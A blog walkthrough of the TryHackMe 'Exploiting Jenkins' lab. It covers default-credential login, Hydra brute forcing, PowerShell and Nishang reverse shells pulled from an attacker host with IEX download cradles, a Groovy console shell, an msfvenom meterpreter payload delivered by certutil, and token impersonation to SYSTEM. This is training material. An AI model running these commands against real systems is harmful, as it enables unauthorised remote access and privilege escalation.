Exploiting Jenkins | Advanced Exploitation | TryHackMe

Jay Wandery
6 min readJul 13, 2023

--

In this room, we’ll learn how to exploit Jenkins and gain initial access as a user then escalate our privileges by exploiting a common misconfiguration on this widely used automation server(Jenkins — This tool is used to create continuous integration/continuous development pipelines that allow developers to automatically deploy their code once they made changes to it).

Gaining Initial Access

In this section, i will demonstrate 3 ways you could use to gain initial access to the Jenkins server.

To start, we will use Nmap to survey for open ports, their service, version as well as any intresting information we may get.

$nmap -sV -sC -sS -T4 -Pn 10.10.136.50

From our nmap scan, we find 3 open ports in which two look intresting. Port 80 running a http-server & Port 8080 running http-server (Jetty). A close look at both, we find http://10.10.136.50:8080 is a login page to the administrators panel.

We need to brutforce for the password to bypass the login page. But, before bruteforcing for the logins. We try commonly used password, user:user, admin:admin, admin:Pa$$word if none of this yields, we search for jenkins server logins on the internet and if this does not work, we brutforce. In jenkins case, this is an easy pass as the logins admin:admin went through. For the sake of learning, i am going to demonstrate another method to gain access using burp suite and Hydra.

Bruteforce for logins with Burp Suite and Hydra

Both Burp suite and hydra are such a powerful tool and their usefulness cannot be underestimated. Lets begin.

Start the intercept and visit the jenkins address and forward the GET request to with burpsuite to your mozzilla.

Once the request is complete, you get a login page, here write any logins. in my case i used test:test as shown below.

Once we’ve intercepted the failed login request to burp, lets visit the POST http proxy history and send it to intruder where we can set our payload and parameters

We cleared the positions and added a fresh where we wanted to bruteforce for passwords. We then selected the pitchfork payload.
take note of the highlighted fields as we are going to use it.

on your terminal, use the command below.

hydra -l <username> -P /usr/share/wordlists/<wordlist> <ip> http-post-form

As expected, the password to the username admin is admin

Get a Reverse Shell

Now that we are logged into the admin panel, lets find a feature of the tool that allows you to execute commands on the underlying system then run it.

— — — — -

I will demonstrate 3 ways/types of command you could use to gain a shell.

— — —

Using PowerShell Reverse TCP

This commands are particularly lengthy and memorising them is of no use, so proceed to your browser and sersch for powershell iex reverse shell. You should get results, i normally visit the https://gist.github.com/egre55/c058744a4240af6515eb32b2d33fbed3

First we need to install the Powershell Reverse_TCP command script on our working folder, (you could paste the code and edit with nano or install from github script) and rename it powershell_reverse_tcp.ps1

wget https://raw.githubusercontent.com/ivan-sincek/powershell-reverse-tcp/master/src/invoke_expression/prompt/powershell_reverse_tcp_prompt.ps1

When the script has been downloaded, simply examine the code within it and replace the IP address given there with our local IP address (Kali IP address). Once the changes are done save the file and start the python server as well as netcat.

$python3 -m http.server 80
replace your LHOST and LPORT as shown.

Time to run the script from your jenkins panel

powershell IEX (New-Object Net.WebClient).DownloadString('http://192.168.1.3/powershell_reverse_tcp.ps1');powershell_reverse_tcp -Reverse -IPAddress <ip> -PORT <port>
we got a connection

Bingo! we got a connection. now we can easily get the user flag

user.txt

Get shell with Invoke-PowerShellTcp (Nishang)

We need to install the nishang powershell script on our current working directory, we could use the command below on terminal.

wget https://raw.githubusercontent.com/samratashok/nishang/master/Shells/Invoke-PowerShellTcp.ps1

Now run the command below on your windows command prompt , make sure your LHOST and LPORT are correct. Make sure to start your netcat and server.

powershell iex (New-Object Net.WebClient).DownloadString('http://192.168.1.3/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress 192.168.1.3 -Port 4444
b

There you have your initial access.

Exploiting with Groovy Scripts

Under the manage jenkins, we find an instrsting path called “Script Console” here we can run grovy scripts and get a shell in a heart beat.

Proceed to your broser to check which groovy scripts to use.

input your correct LHOST and LPORT in the fields and run the script on console and get your reverse shell. Note: you wont necessarilly need to start your python3 server in this case.

You got your reverse shell

Spawn a Meterpreter Shell

From here, it only gets interesting.

Now that we’ve started our metersploit, lets generate payload using msfvenom on our kali machine.

msfconsole
msfvenom -p windows/meterpreter/reverse_tcp -a x86 --encoder x86/shikata_ga_nai LHOST=IP LPORT=PORT -f exe -o shell-name.exe

Once we have our payload shell, we need to transfer it to our windows machine using the certutil tool. First start your webserver on the kali machine and run the command below on your windows shell.

certutil -urlcache -f http://ip:port/shell-name.exe shell-name.exe

Now that our payload has been exported to windows we can proceed to set configure our metasploit. by searching exploit/multi/handler and set payload to windows/meterpreter/reverse_tcp then set your LHOST and Lports accordingly and run the exploit.

This is where things get interesting as to run the exploit we will need to start-process “shell-name” on our windows shell.

Bingo!, we get our meterpreter session. Time to escalate our privillages.

a quick look at the getuid shows we are still a normal user

Privilege Escalation

The end goal is to always gain administrator privilleges. To do so we need to migrate to a suitable process. in my case i love migrating to spools service as its much stable process.

Lets load incogito and check for list_token that we can impersonate

>load incognito

We get lots of tokens but we are only interested in one “BUILTIN\Administrators” . this looks like something worth impersonating

once this is done, we are in as NT AUTHORITY\SYSTEM

we have the administrator flag

We are in as Administrator and we can check his files however we want to.

Thank you for taking time to read this walkthrough, we have been able to compromise this machine using metersploit. I will be writing another walkthrough demonstrating how to compromise the same machine manually.

Happy Hacking! Cheers.

--

--

Jay Wandery
Jay Wandery

Responses (1)